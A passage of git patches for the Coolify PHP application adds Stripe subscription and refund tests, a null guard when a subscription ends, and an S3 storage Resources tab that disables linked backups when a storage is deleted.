diff --git a/app/Models/Team.php b/app/Models/Team.php
index e32526169..10b22b4e1 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -197,6 +197,10 @@ public function isAnyNotificationEnabled()
 
     public function subscriptionEnded()
     {
+        if (! $this->subscription) {
+            return;
+        }
+
         $this->subscription->update([
             'stripe_subscription_id' => null,
             'stripe_cancel_at_period_end' => false,
diff --git a/tests/Feature/Subscription/RefundSubscriptionTest.php b/tests/Feature/Subscription/RefundSubscriptionTest.php
index b6c2d4064..144cdad09 100644
--- a/tests/Feature/Subscription/RefundSubscriptionTest.php
+++ b/tests/Feature/Subscription/RefundSubscriptionTest.php
@@ -251,6 +251,56 @@
         expect($result['error'])->toContain('No payment intent');
     });
 
+    test('records refund and proceeds when cancel fails', function () {
+        $stripeSubscription = (object) [
+            'status' => 'active',
+            'start_date' => now()->subDays(10)->timestamp,
+        ];
+
+        $this->mockSubscriptions
+            ->shouldReceive('retrieve')
+            ->with('sub_test_123')
+            ->andReturn($stripeSubscription);
+
+        $invoiceCollection = (object) ['data' => [
+            (object) ['payment_intent' => 'pi_test_123'],
+        ]];
+
+        $this->mockInvoices
+            ->shouldReceive('all')
+            ->with([
+                'subscription' => 'sub_test_123',
+                'status' => 'paid',
+                'limit' => 1,
+            ])
+            ->andReturn($invoiceCollection);
+
+        $this->mockRefunds
+            ->shouldReceive('create')
+            ->with(['payment_intent' => 'pi_test_123'])
+            ->andReturn((object) ['id' => 're_test_123']);
+
+        // Cancel throws — simulating Stripe failure after refund
+        $this->mockSubscriptions
+            ->shouldReceive('cancel')
+            ->with('sub_test_123')
+            ->andThrow(new \Exception('Stripe cancel API error'));
+
+        $action = new RefundSubscription($this->mockStripe);
+        $result = $action->execute($this->team);
+
+        // Should still succeed — refund went through
+        expect($result['success'])->toBeTrue();
+        expect($result['error'])->toBeNull();
+
+        $this->subscription->refresh();
+        // Refund timestamp must be recorded
+        expect($this->subscription->stripe_refunded_at)->not->toBeNull();
+        // Subscription should still be marked as ended locally
+        expect($this->subscription->stripe_invoice_paid)->toBeFalsy();
+        expect($this->subscription->stripe_subscription_id)->toBeNull();
+    });
+
     test('fails when subscription is past refund window', function () {
         $stripeSubscription = (object) [
             'status' => 'active',
diff --git a/tests/Feature/Subscription/StripeProcessJobTest.php b/tests/Feature/Subscription/StripeProcessJobTest.php
new file mode 100644
index 000000000..95cff188a
--- /dev/null
+++ b/tests/Feature/Subscription/StripeProcessJobTest.php
@@ -0,0 +1,143 @@
+<?php
+
+use App\Jobs\ServerLimitCheckJob;
+use App\Jobs\StripeProcessJob;
+use App\Models\Subscription;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Queue;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    config()->set('constants.coolify.self_hosted', false);
+    config()->set('subscription.provider', 'stripe');
+    config()->set('subscription.stripe_api_key', 'sk_test_fake');
+    config()->set('subscription.stripe_excluded_plans', '');
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+});
+
+describe('customer.subscription.created does not fall through to updated', function () {
+    test('created event creates subscription without setting stripe_invoice_paid to true', function () {
+        Queue::fake();
+
+        $event = [
+            'type' => 'customer.subscription.created',
+            'data' => [
+                'object' => [
+                    'customer' => 'cus_new_123',
+                    'id' => 'sub_new_123',
+                    'metadata' => [
+                        'team_id' => $this->team->id,
+                        'user_id' => $this->user->id,
+                    ],
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        $subscription = Subscription::where('team_id', $this->team->id)->first();
+
+        expect($subscription)->not->toBeNull();
+        expect($subscription->stripe_subscription_id)->toBe('sub_new_123');
+        expect($subscription->stripe_customer_id)->toBe('cus_new_123');
+        // Critical: stripe_invoice_paid must remain false — payment not yet confirmed
+        expect($subscription->stripe_invoice_paid)->toBeFalsy();
+    });
+});
+
+describe('customer.subscription.updated clamps quantity to MAX_SERVER_LIMIT', function () {
+    test('quantity exceeding MAX is clamped to 100', function () {
+        Queue::fake();
+
+        Subscription::create([
+            'team_id' => $this->team->id,
+            'stripe_subscription_id' => 'sub_existing',
+            'stripe_customer_id' => 'cus_clamp_test',
+            'stripe_invoice_paid' => true,
+        ]);
+
+        $event = [
+            'type' => 'customer.subscription.updated',
+            'data' => [
+                'object' => [
+                    'customer' => 'cus_clamp_test',
+                    'id' => 'sub_existing',
+                    'status' => 'active',
+                    'metadata' => [
+                        'team_id' => $this->team->id,
+                        'user_id' => $this->user->id,
+                    ],
+                    'items' => [
+                        'data' => [[
+                            'subscription' => 'sub_existing',
+                            'plan' => ['id' => 'price_dynamic_monthly'],
+                            'price' => ['lookup_key' => 'dynamic_monthly'],
+                            'quantity' => 999,
+                        ]],
+                    ],
+                    'cancel_at_period_end' => false,
+                    'cancellation_details' => ['feedback' => null, 'comment' => null],
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        $this->team->refresh();
+        expect($this->team->custom_server_limit)->toBe(100);
+
+        Queue::assertPushed(ServerLimitCheckJob::class);
+    });
+});
+
+describe('ServerLimitCheckJob dispatch is guarded by team check', function () {
+    test('does not dispatch ServerLimitCheckJob when team is null', function () {
+        Queue::fake();
+
+        // Create subscription without a valid team relationship
+        $subscription = Subscription::create([
+            'team_id' => 99999,
+            'stripe_subscription_id' => 'sub_orphan',
+            'stripe_customer_id' => 'cus_orphan_test',
+            'stripe_invoice_paid' => true,
+        ]);
+
+        $event = [
+            'type' => 'customer.subscription.updated',
+            'data' => [
+                'object' => [
+                    'customer' => 'cus_orphan_test',
+                    'id' => 'sub_orphan',
+                    'status' => 'active',
+                    'metadata' => [
+                        'team_id' => null,
+                        'user_id' => null,
+                    ],
+                    'items' => [
+                        'data' => [[
+                            'subscription' => 'sub_orphan',
+                            'plan' => ['id' => 'price_dynamic_monthly'],
+                            'price' => ['lookup_key' => 'dynamic_monthly'],
+                            'quantity' => 5,
+                        ]],
+                    ],
+                    'cancel_at_period_end' => false,
+                    'cancellation_details' => ['feedback' => null, 'comment' => null],
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        Queue::assertNotPushed(ServerLimitCheckJob::class);
+    });
+});
diff --git a/tests/Feature/Subscription/TeamSubscriptionEndedTest.php b/tests/Feature/Subscription/TeamSubscriptionEndedTest.php
new file mode 100644
index 000000000..55d59e0e6
--- /dev/null
+++ b/tests/Feature/Subscription/TeamSubscriptionEndedTest.php
@@ -0,0 +1,16 @@
+<?php
+
+use App\Models\Team;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+test('subscriptionEnded does not throw when team has no subscription', function () {
+    $team = Team::factory()->create();
+
+    // Should return early without error — no NPE
+    $team->subscriptionEnded();
+
+    // If we reach here, no exception was thrown
+    expect(true)->toBeTrue();
+});
diff --git a/tests/Feature/Subscription/VerifyStripeSubscriptionStatusJobTest.php b/tests/Feature/Subscription/VerifyStripeSubscriptionStatusJobTest.php
new file mode 100644
index 000000000..be8661b6c
--- /dev/null
+++ b/tests/Feature/Subscription/VerifyStripeSubscriptionStatusJobTest.php
@@ -0,0 +1,102 @@
+<?php
+
+use App\Jobs\VerifyStripeSubscriptionStatusJob;
+use App\Models\Server;
+use App\Models\Subscription;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Stripe\Service\SubscriptionService;
+use Stripe\StripeClient;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    config()->set('constants.coolify.self_hosted', false);
+    config()->set('subscription.provider', 'stripe');
+    config()->set('subscription.stripe_api_key', 'sk_test_fake');
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $this->subscription = Subscription::create([
+        'team_id' => $this->team->id,
+        'stripe_subscription_id' => 'sub_verify_123',
+        'stripe_customer_id' => 'cus_verify_123',
+        'stripe_invoice_paid' => true,
+        'stripe_past_due' => false,
+    ]);
+});
+
+test('subscriptionEnded is called for unpaid status', function () {
+    $mockStripe = Mockery::mock(StripeClient::class);
+    $mockSubscriptions = Mockery::mock(SubscriptionService::class);
+    $mockStripe->subscriptions = $mockSubscriptions;
+
+    $mockSubscriptions
+        ->shouldReceive('retrieve')
+        ->with('sub_verify_123')
+        ->andReturn((object) [
+            'status' => 'unpaid',
+            'cancel_at_period_end' => false,
+        ]);
+
+    app()->bind(StripeClient::class, fn () => $mockStripe);
+
+    // Create a server to verify it gets disabled
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+
+    $job = new VerifyStripeSubscriptionStatusJob($this->subscription);
+    $job->handle();
+
+    $this->subscription->refresh();
+    expect($this->subscription->stripe_invoice_paid)->toBeFalsy();
+    expect($this->subscription->stripe_subscription_id)->toBeNull();
+});
+
+test('subscriptionEnded is called for incomplete_expired status', function () {
+    $mockStripe = Mockery::mock(StripeClient::class);
+    $mockSubscriptions = Mockery::mock(SubscriptionService::class);
+    $mockStripe->subscriptions = $mockSubscriptions;
+
+    $mockSubscriptions
+        ->shouldReceive('retrieve')
+        ->with('sub_verify_123')
+        ->andReturn((object) [
+            'status' => 'incomplete_expired',
+            'cancel_at_period_end' => false,
+        ]);
+
+    app()->bind(StripeClient::class, fn () => $mockStripe);
+
+    $job = new VerifyStripeSubscriptionStatusJob($this->subscription);
+    $job->handle();
+
+    $this->subscription->refresh();
+    expect($this->subscription->stripe_invoice_paid)->toBeFalsy();
+    expect($this->subscription->stripe_subscription_id)->toBeNull();
+});
+
+test('subscriptionEnded is called for canceled status', function () {
+    $mockStripe = Mockery::mock(StripeClient::class);
+    $mockSubscriptions = Mockery::mock(SubscriptionService::class);
+    $mockStripe->subscriptions = $mockSubscriptions;
+
+    $mockSubscriptions
+        ->shouldReceive('retrieve')
+        ->with('sub_verify_123')
+        ->andReturn((object) [
+            'status' => 'canceled',
+            'cancel_at_period_end' => false,
+        ]);
+
+    app()->bind(StripeClient::class, fn () => $mockStripe);
+
+    $job = new VerifyStripeSubscriptionStatusJob($this->subscription);
+    $job->handle();
+
+    $this->subscription->refresh();
+    expect($this->subscription->stripe_invoice_paid)->toBeFalsy();
+    expect($this->subscription->stripe_subscription_id)->toBeNull();
+});

From ca3ae289eb7f48bac23ae143ff5c1416b14ab72e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 11:42:29 +0100
Subject: [PATCH 087/213] feat(storage): add resources tab and improve S3
 deletion handling

Add new Resources tab to storage show page displaying backup schedules using
that storage. Refactor storage show layout with navigation tabs for General
and Resources sections. Move delete action from form to show component.

Implement cascade deletion in S3Storage model to automatically disable S3
backups when storage is deleted. Improve error handling in DatabaseBackupJob
to throw exception when S3 storage is missing instead of silently returning.

- New Storage/Resources Livewire component
- Add resources.blade.php view
- Add storage.resources route
- Move delete() method from Form to Show component
- Add deleting event listener to S3Storage model
- Track backup count and current route in Show component
- Add #[On('submitStorage')] attribute to form submission
---
 app/Jobs/DatabaseBackupJob.php                |  12 +-
 app/Livewire/Storage/Form.php                 |  15 +--
 app/Livewire/Storage/Resources.php            |  23 ++++
 app/Livewire/Storage/Show.php                 |  20 ++++
 app/Models/S3Storage.php                      |  12 ++
 .../views/livewire/storage/form.blade.php     |  31 -----
 .../livewire/storage/resources.blade.php      |  62 ++++++++++
 .../views/livewire/storage/show.blade.php     |  48 +++++++-
 routes/web.php                                |   1 +
 tests/Feature/DatabaseBackupJobTest.php       | 109 ++++++++++++++++++
 10 files changed, 285 insertions(+), 48 deletions(-)
 create mode 100644 app/Livewire/Storage/Resources.php
 create mode 100644 resources/views/livewire/storage/resources.blade.php

diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index 5fc9f6cd8..b55c324be 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -625,10 +625,16 @@ private function calculate_size()
 
     private function upload_to_s3(): void
     {
+        if (is_null($this->s3)) {
+            $this->backup->update([
+                'save_s3' => false,
+                's3_storage_id' => null,
+            ]);
+
+            throw new \Exception('S3 storage configuration is missing or has been deleted (S3 storage ID: '.($this->backup->s3_storage_id ?? 'null').'). S3 backup has been disabled for this schedule.');
+        }
+
         try {
-            if (is_null($this->s3)) {
-                return;
-            }
             $key = $this->s3->key;
             $secret = $this->s3->secret;
             // $region = $this->s3->region;
diff --git a/app/Livewire/Storage/Form.php b/app/Livewire/Storage/Form.php
index 4dc0b6ae2..791226334 100644
--- a/app/Livewire/Storage/Form.php
+++ b/app/Livewire/Storage/Form.php
@@ -6,6 +6,7 @@
 use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Facades\DB;
+use Livewire\Attributes\On;
 use Livewire\Component;
 
 class Form extends Component
@@ -131,19 +132,7 @@ public function testConnection()
         }
     }
 
-    public function delete()
-    {
-        try {
-            $this->authorize('delete', $this->storage);
-
-            $this->storage->delete();
-
-            return redirect()->route('storage.index');
-        } catch (\Throwable $e) {
-            return handleError($e, $this);
-        }
-    }
-
+    #[On('submitStorage')]
     public function submit()
     {
         try {
diff --git a/app/Livewire/Storage/Resources.php b/app/Livewire/Storage/Resources.php
new file mode 100644
index 000000000..f17175013
--- /dev/null
+++ b/app/Livewire/Storage/Resources.php
@@ -0,0 +1,23 @@
+<?php
+
+namespace App\Livewire\Storage;
+
+use App\Models\S3Storage;
+use App\Models\ScheduledDatabaseBackup;
+use Livewire\Component;
+
+class Resources extends Component
+{
+    public S3Storage $storage;
+
+    public function render()
+    {
+        $backups = ScheduledDatabaseBackup::where('s3_storage_id', $this->storage->id)
+            ->with('database')
+            ->get();
+
+        return view('livewire.storage.resources', [
+            'backups' => $backups,
+        ]);
+    }
+}
diff --git a/app/Livewire/Storage/Show.php b/app/Livewire/Storage/Show.php
index fdf3d0d28..dc5121e94 100644
--- a/app/Livewire/Storage/Show.php
+++ b/app/Livewire/Storage/Show.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Storage;
 
 use App\Models\S3Storage;
+use App\Models\ScheduledDatabaseBackup;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
@@ -12,6 +13,10 @@ class Show extends Component
 
     public $storage = null;
 
+    public string $currentRoute = '';
+
+    public int $backupCount = 0;
+
     public function mount()
     {
         $this->storage = S3Storage::ownedByCurrentTeam()->whereUuid(request()->storage_uuid)->first();
@@ -19,6 +24,21 @@ public function mount()
             abort(404);
         }
         $this->authorize('view', $this->storage);
+        $this->currentRoute = request()->route()->getName();
+        $this->backupCount = ScheduledDatabaseBackup::where('s3_storage_id', $this->storage->id)->count();
+    }
+
+    public function delete()
+    {
+        try {
+            $this->authorize('delete', $this->storage);
+
+            $this->storage->delete();
+
+            return redirect()->route('storage.index');
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
     }
 
     public function render()
diff --git a/app/Models/S3Storage.php b/app/Models/S3Storage.php
index 3aae55966..f395a065c 100644
--- a/app/Models/S3Storage.php
+++ b/app/Models/S3Storage.php
@@ -40,6 +40,13 @@ protected static function boot(): void
                 $storage->secret = trim($storage->secret);
             }
         });
+
+        static::deleting(function (S3Storage $storage) {
+            ScheduledDatabaseBackup::where('s3_storage_id', $storage->id)->update([
+                'save_s3' => false,
+                's3_storage_id' => null,
+            ]);
+        });
     }
 
     public static function ownedByCurrentTeam(array $select = ['*'])
@@ -59,6 +66,11 @@ public function team()
         return $this->belongsTo(Team::class);
     }
 
+    public function scheduledBackups()
+    {
+        return $this->hasMany(ScheduledDatabaseBackup::class, 's3_storage_id');
+    }
+
     public function awsUrl()
     {
         return "{$this->endpoint}/{$this->bucket}";
diff --git a/resources/views/livewire/storage/form.blade.php b/resources/views/livewire/storage/form.blade.php
index 850d7735f..3d9fd322b 100644
--- a/resources/views/livewire/storage/form.blade.php
+++ b/resources/views/livewire/storage/form.blade.php
@@ -1,36 +1,5 @@
 <div>
     <form class="flex flex-col gap-2 pb-6" wire:submit='submit'>
-        <div class="flex items-start gap-2">
-            <div class="">
-                <h1>Storage Details</h1>
-                <div class="subtitle">{{ $storage->name }}</div>
-                <div class="flex items-center gap-2 pb-4">
-                    <div>Current Status:</div>
-                    @if ($isUsable)
-                        <span
-                            class="px-2 py-1 text-xs font-semibold text-green-800 bg-green-100 rounded dark:text-green-100 dark:bg-green-800">
-                            Usable
-                        </span>
-                    @else
-                        <span
-                            class="px-2 py-1 text-xs font-semibold text-red-800 bg-red-100 rounded dark:text-red-100 dark:bg-red-800">
-                            Not Usable
-                        </span>
-                    @endif
-                </div>
-            </div>
-            <x-forms.button canGate="update" :canResource="$storage" type="submit">Save</x-forms.button>
-
-            @can('delete', $storage)
-                <x-modal-confirmation title="Confirm Storage Deletion?" isErrorButton buttonTitle="Delete"
-                    submitAction="delete({{ $storage->id }})" :actions="[
-                        'The selected storage location will be permanently deleted from Coolify.',
-                        'If the storage location is in use by any backup jobs those backup jobs will only store the backup locally on the server.',
-                    ]" confirmationText="{{ $storage->name }}"
-                    confirmationLabel="Please confirm the execution of the actions by entering the Storage Name below"
-                    shortConfirmationLabel="Storage Name" :confirmWithPassword="false" step2ButtonText="Permanently Delete" />
-            @endcan
-        </div>
         <div class="flex gap-2">
             <x-forms.input canGate="update" :canResource="$storage" label="Name" id="name" />
             <x-forms.input canGate="update" :canResource="$storage" label="Description" id="description" />
diff --git a/resources/views/livewire/storage/resources.blade.php b/resources/views/livewire/storage/resources.blade.php
new file mode 100644
index 000000000..29d26d4f5
--- /dev/null
+++ b/resources/views/livewire/storage/resources.blade.php
@@ -0,0 +1,62 @@
+<div>
+    <div class="grid gap-4 lg:grid-cols-2">
+        @forelse ($backups as $backup)
+            @php
+                $database = $backup->database;
+                $databaseName = $database?->name ?? 'Deleted database';
+                $link = null;
+                if ($database && $database instanceof \App\Models\ServiceDatabase) {
+                    $service = $database->service;
+                    if ($service) {
+                        $environment = $service->environment;
+                        $project = $environment?->project;
+                        if ($project && $environment) {
+                            $link = route('project.service.configuration', [
+                                'project_uuid' => $project->uuid,
+                                'environment_uuid' => $environment->uuid,
+                                'service_uuid' => $service->uuid,
+                            ]);
+                        }
+                    }
+                } elseif ($database) {
+                    $environment = $database->environment;
+                    $project = $environment?->project;
+                    if ($project && $environment) {
+                        $link = route('project.database.backup.index', [
+                            'project_uuid' => $project->uuid,
+                            'environment_uuid' => $environment->uuid,
+                            'database_uuid' => $database->uuid,
+                        ]);
+                    }
+                }
+            @endphp
+            @if ($link)
+                <a {{ wireNavigate() }} href="{{ $link }}" @class(['gap-2 border cursor-pointer coolbox group'])>
+            @else
+                <div @class(['gap-2 border coolbox'])>
+            @endif
+                <div class="flex flex-col justify-center mx-6">
+                    <div class="box-title">
+                        {{ $databaseName }}
+                    </div>
+                    <div class="box-description">
+                        Frequency: {{ $backup->frequency }}
+                    </div>
+                    @if (!$backup->enabled)
+                        <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded dark:text-yellow-100 dark:bg-yellow-800 w-fit">
+                            Disabled
+                        </span>
+                    @endif
+                </div>
+            @if ($link)
+                </a>
+            @else
+                </div>
+            @endif
+        @empty
+            <div>
+                <div>No backup schedules are using this storage.</div>
+            </div>
+        @endforelse
+    </div>
+</div>
diff --git a/resources/views/livewire/storage/show.blade.php b/resources/views/livewire/storage/show.blade.php
index 1c3a11a69..e54de37f3 100644
--- a/resources/views/livewire/storage/show.blade.php
+++ b/resources/views/livewire/storage/show.blade.php
@@ -2,5 +2,51 @@
     <x-slot:title>
         {{ data_get_str($storage, 'name')->limit(10) }} >Storages | Coolify
     </x-slot>
-    <livewire:storage.form :storage="$storage" />
+
+    <div class="flex items-center gap-2">
+        <h1>Storage Details</h1>
+        @if ($storage->is_usable)
+            <span class="px-2 py-1 text-xs font-semibold text-green-800 bg-green-100 rounded dark:text-green-100 dark:bg-green-800">
+                Usable
+            </span>
+        @else
+            <span class="px-2 py-1 text-xs font-semibold text-red-800 bg-red-100 rounded dark:text-red-100 dark:bg-red-800">
+                Not Usable
+            </span>
+        @endif
+        <x-forms.button canGate="update" :canResource="$storage" wire:click="$dispatch('submitStorage')" :disabled="$currentRoute !== 'storage.show'">Save</x-forms.button>
+        @can('delete', $storage)
+            <x-modal-confirmation title="Confirm Storage Deletion?" isErrorButton buttonTitle="Delete"
+                submitAction="delete({{ $storage->id }})" :actions="array_filter([
+                    'The selected storage location will be permanently deleted from Coolify.',
+                    $backupCount > 0
+                        ? $backupCount . ' backup schedule(s) will be updated to no longer save to S3 and will only store backups locally on the server.'
+                        : null,
+                ])" confirmationText="{{ $storage->name }}"
+                confirmationLabel="Please confirm the execution of the actions by entering the Storage Name below"
+                shortConfirmationLabel="Storage Name" :confirmWithPassword="false" step2ButtonText="Permanently Delete" />
+        @endcan
+    </div>
+    <div class="subtitle">{{ $storage->name }}</div>
+
+    <div class="navbar-main">
+        <nav class="flex shrink-0 gap-6 items-center whitespace-nowrap scrollbar min-h-10">
+            <a class="{{ request()->routeIs('storage.show') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('storage.show', ['storage_uuid' => $storage->uuid]) }}">
+                General
+            </a>
+            <a class="{{ request()->routeIs('storage.resources') ? 'dark:text-white' : '' }}" {{ wireNavigate() }}
+                href="{{ route('storage.resources', ['storage_uuid' => $storage->uuid]) }}">
+                Resources
+            </a>
+        </nav>
+    </div>
+
+    <div class="pt-4">
+    @if ($currentRoute === 'storage.show')
+        <livewire:storage.form :storage="$storage" />
+    @elseif ($currentRoute === 'storage.resources')
+        <livewire:storage.resources :storage="$storage" />
+    @endif
+    </div>
 </div>
diff --git a/routes/web.php b/routes/web.php
index 26863aa17..27763f121 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -140,6 +140,7 @@
     Route::prefix('storages')->group(function () {
         Route::get('/', StorageIndex::class)->name('storage.index');
         Route::get('/{storage_uuid}', StorageShow::class)->name('storage.show');
+        Route::get('/{storage_uuid}/resources', StorageShow::class)->name('storage.resources');
     });
     Route::prefix('shared-variables')->group(function () {
         Route::get('/', SharedVariablesIndex::class)->name('shared-variables.index');
diff --git a/tests/Feature/DatabaseBackupJobTest.php b/tests/Feature/DatabaseBackupJobTest.php
index d7efc2bcd..37c377dab 100644
--- a/tests/Feature/DatabaseBackupJobTest.php
+++ b/tests/Feature/DatabaseBackupJobTest.php
@@ -1,6 +1,10 @@
 <?php
 
+use App\Jobs\DatabaseBackupJob;
+use App\Models\S3Storage;
+use App\Models\ScheduledDatabaseBackup;
 use App\Models\ScheduledDatabaseBackupExecution;
+use App\Models\Team;
 use Illuminate\Foundation\Testing\RefreshDatabase;
 use Illuminate\Support\Facades\Schema;
 
@@ -35,3 +39,108 @@
     expect($casts)->toHaveKey('s3_storage_deleted');
     expect($casts['s3_storage_deleted'])->toBe('boolean');
 });
+
+test('upload_to_s3 throws exception and disables s3 when storage is null', function () {
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => 99999,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => Team::factory()->create()->id,
+    ]);
+
+    $job = new DatabaseBackupJob($backup);
+
+    $reflection = new ReflectionClass($job);
+    $s3Property = $reflection->getProperty('s3');
+    $s3Property->setValue($job, null);
+
+    $method = $reflection->getMethod('upload_to_s3');
+
+    expect(fn () => $method->invoke($job))
+        ->toThrow(Exception::class, 'S3 storage configuration is missing or has been deleted');
+
+    $backup->refresh();
+    expect($backup->save_s3)->toBeFalsy();
+    expect($backup->s3_storage_id)->toBeNull();
+});
+
+test('deleting s3 storage disables s3 on linked backups', function () {
+    $team = Team::factory()->create();
+
+    $s3 = S3Storage::create([
+        'name' => 'Test S3',
+        'region' => 'us-east-1',
+        'key' => 'test-key',
+        'secret' => 'test-secret',
+        'bucket' => 'test-bucket',
+        'endpoint' => 'https://s3.example.com',
+        'team_id' => $team->id,
+    ]);
+
+    $backup1 = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => $s3->id,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => $team->id,
+    ]);
+
+    $backup2 = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => $s3->id,
+        'database_type' => 'App\Models\StandaloneMysql',
+        'database_id' => 2,
+        'team_id' => $team->id,
+    ]);
+
+    // Unrelated backup should not be affected
+    $unrelatedBackup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => null,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 3,
+        'team_id' => $team->id,
+    ]);
+
+    $s3->delete();
+
+    $backup1->refresh();
+    $backup2->refresh();
+    $unrelatedBackup->refresh();
+
+    expect($backup1->save_s3)->toBeFalsy();
+    expect($backup1->s3_storage_id)->toBeNull();
+    expect($backup2->save_s3)->toBeFalsy();
+    expect($backup2->s3_storage_id)->toBeNull();
+    expect($unrelatedBackup->save_s3)->toBeTruthy();
+});
+
+test('s3 storage has scheduled backups relationship', function () {
+    $team = Team::factory()->create();
+
+    $s3 = S3Storage::create([
+        'name' => 'Test S3',
+        'region' => 'us-east-1',
+        'key' => 'test-key',
+        'secret' => 'test-secret',
+        'bucket' => 'test-bucket',
+        'endpoint' => 'https://s3.example.com',
+        'team_id' => $team->id,
+    ]);
+
+    ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => $s3->id,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => $team->id,
+    ]);
+
+    expect($s3->scheduledBackups()->count())->toBe(1);
+});

From 86c8ec9c20b7f2f4dcc8ed1b75efa39b7b2b2763 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 12:04:16 +0100
Subject: [PATCH 088/213] feat(storage): group backups by database and filter
 by s3 status

Group backup schedules by their parent database (type + ID) for better
organization in the UI. Filter to only display backups with save_s3
enabled. Restructure the template to show database name as a header with
nested backups underneath, allowing clearer visualization of which
backups belong to each database. Add key binding to livewire component
to ensure proper re-rendering when resources change.
---
 app/Livewire/Storage/Resources.php            |   6 +-
 .../livewire/storage/resources.blade.php      | 123 ++++++++++--------
 .../views/livewire/storage/show.blade.php     |   2 +-
 3 files changed, 76 insertions(+), 55 deletions(-)

diff --git a/app/Livewire/Storage/Resources.php b/app/Livewire/Storage/Resources.php
index f17175013..30ac67066 100644
--- a/app/Livewire/Storage/Resources.php
+++ b/app/Livewire/Storage/Resources.php
@@ -13,11 +13,13 @@ class Resources extends Component
     public function render()
     {
         $backups = ScheduledDatabaseBackup::where('s3_storage_id', $this->storage->id)
+            ->where('save_s3', true)
             ->with('database')
-            ->get();
+            ->get()
+            ->groupBy(fn ($backup) => $backup->database_type.'-'.$backup->database_id);
 
         return view('livewire.storage.resources', [
-            'backups' => $backups,
+            'groupedBackups' => $backups,
         ]);
     }
 }
diff --git a/resources/views/livewire/storage/resources.blade.php b/resources/views/livewire/storage/resources.blade.php
index 29d26d4f5..4fdef1e4b 100644
--- a/resources/views/livewire/storage/resources.blade.php
+++ b/resources/views/livewire/storage/resources.blade.php
@@ -1,62 +1,81 @@
 <div>
-    <div class="grid gap-4 lg:grid-cols-2">
-        @forelse ($backups as $backup)
-            @php
-                $database = $backup->database;
-                $databaseName = $database?->name ?? 'Deleted database';
-                $link = null;
-                if ($database && $database instanceof \App\Models\ServiceDatabase) {
-                    $service = $database->service;
-                    if ($service) {
-                        $environment = $service->environment;
-                        $project = $environment?->project;
-                        if ($project && $environment) {
-                            $link = route('project.service.configuration', [
-                                'project_uuid' => $project->uuid,
-                                'environment_uuid' => $environment->uuid,
-                                'service_uuid' => $service->uuid,
-                            ]);
-                        }
-                    }
-                } elseif ($database) {
-                    $environment = $database->environment;
+    @forelse ($groupedBackups as $backups)
+        @php
+            $firstBackup = $backups->first();
+            $database = $firstBackup->database;
+            $databaseName = $database?->name ?? 'Deleted database';
+            $resourceLink = null;
+            $backupParams = null;
+            if ($database && $database instanceof \App\Models\ServiceDatabase) {
+                $service = $database->service;
+                if ($service) {
+                    $environment = $service->environment;
                     $project = $environment?->project;
                     if ($project && $environment) {
-                        $link = route('project.database.backup.index', [
+                        $resourceLink = route('project.service.configuration', [
                             'project_uuid' => $project->uuid,
                             'environment_uuid' => $environment->uuid,
-                            'database_uuid' => $database->uuid,
+                            'service_uuid' => $service->uuid,
                         ]);
                     }
                 }
-            @endphp
-            @if ($link)
-                <a {{ wireNavigate() }} href="{{ $link }}" @class(['gap-2 border cursor-pointer coolbox group'])>
-            @else
-                <div @class(['gap-2 border coolbox'])>
-            @endif
-                <div class="flex flex-col justify-center mx-6">
-                    <div class="box-title">
-                        {{ $databaseName }}
-                    </div>
-                    <div class="box-description">
-                        Frequency: {{ $backup->frequency }}
-                    </div>
-                    @if (!$backup->enabled)
-                        <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded dark:text-yellow-100 dark:bg-yellow-800 w-fit">
-                            Disabled
-                        </span>
-                    @endif
-                </div>
-            @if ($link)
-                </a>
-            @else
-                </div>
-            @endif
-        @empty
-            <div>
-                <div>No backup schedules are using this storage.</div>
